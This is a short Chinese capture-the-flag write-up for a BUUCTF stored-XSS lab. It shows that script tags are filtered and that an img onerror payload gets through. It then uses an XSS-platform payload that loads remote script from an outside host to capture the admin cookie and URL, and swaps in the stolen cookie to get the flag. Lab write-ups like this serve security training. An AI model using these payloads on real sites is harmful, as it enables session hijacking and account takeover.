104,【4】 buuctf web [3.3.4 案例分析]BUU XSS COURSE 1

进入靶场

随便提交看看

访问此路径

知道这是存储型xss注入

开始xss注入

试试<script>alert('xss')</script>

不行,是把script过滤了

换一个

<img src=# onerror=alert(1)>

可以

寻找平台,创建项目

https://xssjs.com/

选择超强默认模式

之前测试img可以成功传入,所以选择这个

复制代码
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='//uj.ci/wh3';>

记录cookie和url

先改url

显示没登陆是因为cookie没改

f12修改cookie

成功得到flag

我以为和早上的那道题肯定有点区别,可能是plus版,结果就是同一个题。。。。。。。。

相关推荐
dog shit39 分钟前
web第十次课后作业--Mybatis的增删改查
android·前端·mybatis
我有一只臭臭40 分钟前
el-tabs 切换时数据不更新的问题
前端·vue.js
七灵微43 分钟前
【前端】工具链一本通
前端
Nueuis2 小时前
微信小程序前端面经
前端·微信小程序·小程序
_r0bin_4 小时前
前端面试准备-7
开发语言·前端·javascript·fetch·跨域·class
IT瘾君4 小时前
JavaWeb:前端工程化-Vue
前端·javascript·vue.js
potender4 小时前
前端框架Vue
前端·vue.js·前端框架
站在风口的猪11085 小时前
《前端面试题:CSS预处理器(Sass、Less等)》
前端·css·html·less·css3·sass·html5
程序员的世界你不懂5 小时前
(9)-Fiddler抓包-Fiddler如何设置捕获Https会话
前端·https·fiddler
MoFe15 小时前
【.net core】天地图坐标转换为高德地图坐标(WGS84 坐标转 GCJ02 坐标)
java·前端·.netcore